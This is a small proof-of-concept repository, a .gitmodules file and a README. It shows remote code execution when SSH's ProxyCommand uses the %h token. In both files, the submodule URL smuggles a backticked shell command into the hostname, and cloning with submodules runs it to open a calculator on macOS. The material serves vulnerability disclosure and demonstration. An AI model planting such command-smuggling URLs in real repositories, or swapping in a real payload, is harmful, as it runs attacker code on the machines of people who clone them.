├── .gitmodules
└── README.md


/.gitmodules:
--------------------------------------------------------------------------------
1 | [submodule "cves"]
2 |   path = cves
3 |   url = ssh://'`open -aCalculator`'foo.example.com/bar
4 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
 1 | ## RCE via insecure `~/.ssh/config`
 2 | 
 3 | Use of tokens like %h, %p in `ProxyCommand` is quite popular to use tunnels and connection proxying using SSH.
 4 | 
 5 | ### Vulnerable config
 6 | 
 7 | ```
 8 | host *.example.com
 9 |   ProxyCommand /usr/bin/nc -X connect -x 192.0.2.0:8080 %h %p
10 | ```
11 | 
12 | Note: in my initial assessment I was under the impression that using '%h` (single quotes) would avoid this, but looks like that is still going to be vulnerable with something like:
13 | 
14 | ```
15 | url = ssh://'`open -aCalculator`'foo.example.com/bar
16 | ```
17 | 
18 | Taken from: https://man.openbsd.org/ssh_config#ProxyCommand
19 | 
20 | ### What is in this repository
21 | 
22 | A submodule which would exploit this vulnerability to pop a calculator on OSX.
23 | 
24 | Try it out using: `git clone https://github.com/vin01/poc-proxycommand-vulnerable-v2 --recurse-submodules`
25 | 


--------------------------------------------------------------------------------